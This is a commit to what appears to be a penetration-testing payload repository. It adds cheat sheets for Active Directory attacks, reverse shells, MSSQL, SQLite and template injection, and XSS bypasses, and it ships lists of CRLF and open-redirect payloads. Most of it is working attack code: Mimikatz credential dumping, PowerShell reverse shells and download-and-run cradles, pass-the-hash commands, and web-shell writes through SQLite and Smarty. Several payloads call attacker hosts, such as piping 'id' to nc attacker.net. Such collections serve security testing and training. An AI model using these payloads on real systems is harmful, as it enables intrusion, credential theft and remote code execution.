SQLmap tips + Active Directory attacks + SQLite injections

This commit is contained in:
Swissky 2018-03-12 09:17:31 +01:00
parent 70f38d5678
commit 30019235f8
13 changed files with 492 additions and 25 deletions

View File

@ -0,0 +1,17 @@
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

View File

@ -0,0 +1,88 @@
# Active Directory Attacks
## Most common paths to AD compromise
* MS14-068
* MS17-010 (Eternal Blue - Local Admin)
```c
nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
```
* Unconstrained Delegation (incl. pass-the-ticket)
* OverPass-the-Hash (Making the most of NTLM password hashes)
* Pivoting with Local Admin & Passwords in SYSVOL
* Dangerous Built-in Groups Usage
* Dumping AD Domain Credentials
* Golden Tickets
* Kerberoast
* Silver Tickets
* Trust Tickets
## Tools
* [Impacket](https://github.com/CoreSecurity/impacket)
* Responder
* Mimikatz
* [Ranger](https://github.com/funkandwagnalls/ranger)
* BloodHound
* RottenPotato
## Mimikatz
```
load mimikatz
mimikatz_command -f sekurlsa::logonPasswords full
```
## PowerSploit
```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
## PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
```
```
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
## PrivEsc - MS14-068
```
Exploit Python : https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
```
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
```
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
## Kerberoast
```
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/
```
## Thanks to
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)

View File

@ -72,6 +72,10 @@ Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```
Java
```java
r = Runtime.getRuntime()
@ -109,6 +113,14 @@ ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
Access shortcuts, su, nano and autocomplete in a partially tty shell
```
ctrl+z
stty raw -echo
fg
```
/!\ OhMyZSH might break this trick
(From within vi)
```
:!bash
@ -124,3 +136,4 @@ lua: os.execute('/bin/sh')
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [Spawning a TTY Shell](http://netsec.ws/?p=337)
* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)

View File

@ -12,6 +12,7 @@ creds
```
## Metasploit - Psexec
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
```c
use exploit/windows/smb/psexec
set RHOST 10.2.0.3
@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
```
## Crackmapexec (Pass The Hash)
```
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
```
## Winexe (Integrated to Kali)
```python
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
@ -51,6 +57,10 @@ Note: you may need to enable it with the following command
```
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
```
or with psexec(sysinternals)
```
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
```
## Netuse (Windows)
```
@ -69,6 +79,8 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
```
## Thanks
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)

View File

@ -0,0 +1,67 @@
/%09/example.com
/%2f%2fexample.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
///\;@example.com
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
//example.com
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//google%00.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

View File

@ -67,6 +67,29 @@ Commands execution with a line return
something%0Acat%20/etc/passwd
```
Bypass blacklisted word with single quote
```
w'h'o'am'i
```
Bypass blacklisted word with double quote
```
w"h"o"am"i
```
Bypass blacklisted word with $@
```
who$@ami
```
Bypass zsh/bash/sh blacklist
```
echo $0
-> /usr/bin/zsh
echo whoami|$0
```
## Time based data exfiltration
Extracting data : char by char
```

View File

@ -0,0 +1,80 @@
# MSSQL Injection
## MSSQL version
```
SELECT @@version
```
## MSSQL database name
```
SELECT DB_NAME()
```
## MSSQL List Databases
```
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
```
## MSSQL List Column
```
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable
```
## MSSQL List Tables
```
SELECT name FROM master..sysobjects WHERE xtype = U; — use xtype = V for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = U;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable
```
## MSSQL User Password
```
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + - + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL Error based
```
For integer inputs : convert(int,@@version)
For string inputs : ' + convert(int,@@version) + '
```
## MSSQL Time based
```
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
```
## MSSQL Command execution
```
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
```
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
```
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
```
## MSSQL Make user DBA (DB admin)
```
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## Thanks to
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)

View File

@ -43,6 +43,22 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
Shell
```
SQL Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
Using suffix to tamper the injection
```
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
General tamper option and tamper's list
```
@ -338,3 +354,5 @@ mysql> mysql> select version();
* Second Order:
- [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
- [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
- [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)

View File

@ -1,5 +1,9 @@
# SQLite Injection
## SQLite version
```
select sqlite_version();
```
## Integer/String based - Extract table name
```
@ -34,9 +38,9 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
## Remote Command Execution using SQLite command - Attach Database
```
ATTACH DATABASE /var/www/lol.php AS lol;
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES (<?system($_GET[cmd]); ?>);--
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
```
## Remote Command Execution using SQLite command - Load_extension
@ -46,4 +50,4 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
Note: By default this component is disabled
## Thanks to
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)

View File

@ -90,6 +90,13 @@ Bypass using rare address
http://0/
```
Bypass using bash variables (curl only)
```
curl -v "http://evil$google.com"
$google = ""
```
Bypass using tricks combination
```
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
@ -108,6 +115,7 @@ List:
## SSRF via URL Scheme
Dict://
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
```
@ -230,3 +238,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)

View File

@ -1,47 +1,127 @@
# Templates Injections
Template injection allows an attacker to include template code into an existant (or not) template.
> Template injection allows an attacker to include template code into an existant (or not) template.
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
e.g:
```
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
```
## Ruby
#### Basic injection
### Basic injection
```python
<%= 7 * 7 %>
```
#### Retrieve /etc/passwd
### Retrieve /etc/passwd
```python
<%= File.open('/etc/passwd').read %>
```
## Java
#### Basic injection
### Basic injection
```java
${{7*7}}
```
#### Retrieve the systems environment variables.
### Retrieve the systems environment variables.
```java
${T(java.lang.System).getenv()}
```
#### Retrieve /etc/passwd
### Retrieve /etc/passwd
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
## Twig
### Basic injection
```python
{{7*7}}
{{7*'7'}} would result in 49
```
### Template format
```python
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
);
$output = $twig > render (
"Dear {first_name}",
array("first_name" => $user.first_name)
);
```
### Code execution
```python
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
```
## Smarty
```python
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
```
## Freemarker
Default functionality.
```python
<#assign
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
```
## Jade / Codepen
```python
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```
## Velocity
```python
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
## Mako
```python
<%
import os
x=os.popen('id').read()
%>
${x}
```
## Jinja2
[Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
#### Basic injection
### Basic injection
```python
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application.
#### Template format
### Template format
```python
{% extends "layout.html" %}
{% block body %}
@ -54,12 +134,12 @@ The above injections have been tested on Flask application.
```
#### Dump all used classes
### Dump all used classes
```python
{{ ''.__class__.__mro__[2].__subclasses__() }}
```
#### Dump all config variables
### Dump all config variables
```python
{% for key, value in config.iteritems() %}
<dt>{{ key|e }}</dt>
@ -67,18 +147,18 @@ The above injections have been tested on Flask application.
{% endfor %}
```
#### Read remote file
### Read remote file
```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
```
#### Write into remote file
### Write into remote file
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
#### Remote Code Execution via reverse shell
### Remote Code Execution via reverse shell
Listen for connexion
```
nv -lnvp 8000
@ -94,5 +174,5 @@ Inject this template
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
#### Training
[https://w3challs.com/](https://w3challs.com/)
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)

View File

@ -2,5 +2,17 @@
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
</html>

View File

@ -71,6 +71,12 @@ XSS for HTML5
<marquee onstart=alert(1)>
```
XSS using script tag (external payload)
```
<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
XSS in META tag
```
@ -147,7 +153,15 @@ XSS with vbscript: only IE
vbscript:msgbox("XSS")
```
## XSS in files
XSS in XML
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
```
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
```
XSS in XML
```
<html>
<head></head>
@ -432,6 +446,17 @@ Bypass case sensitive
<sCrIpt>alert(1)</ScRipt>
```
Bypass tag blacklist
```
<script x>
<script x>alert('XSS')<script y>
```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```
<img src='1' onerror='alert(0)' <
```
Bypass quotes for string
```
String.fromCharCode(88,83,83)
@ -486,10 +511,6 @@ Bypass space filter with "/" - IE/Firefox/Chrome/Safari
<img/src='1'/onerror=alert(0)>
```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```
<img src='1' onerror='alert(0)' <
```
Bypass document blacklist
```
@ -503,6 +524,7 @@ foo="text </script><script>alert(1)</script>";
</script>
```
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
```
window['alert'](0)
@ -566,6 +588,22 @@ Bypass ';' using another character
'te' instanceof alert('instanceof') instanceof 'xt';
```
Bypass using HTML encoding
```
%26%2397;lert(1)
```
Bypass using Katakana (https://github.com/aemkei/katakana.js)
```
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
Bypass using Octal encoding
```
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```
Bypass using Unicode
```
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
@ -672,6 +710,12 @@ Exotic payloads
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
```
## Incapsula WAF Bypass - 8th march
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
## More fun ?
This section will be used for the "fun/interesting/useless" stuff.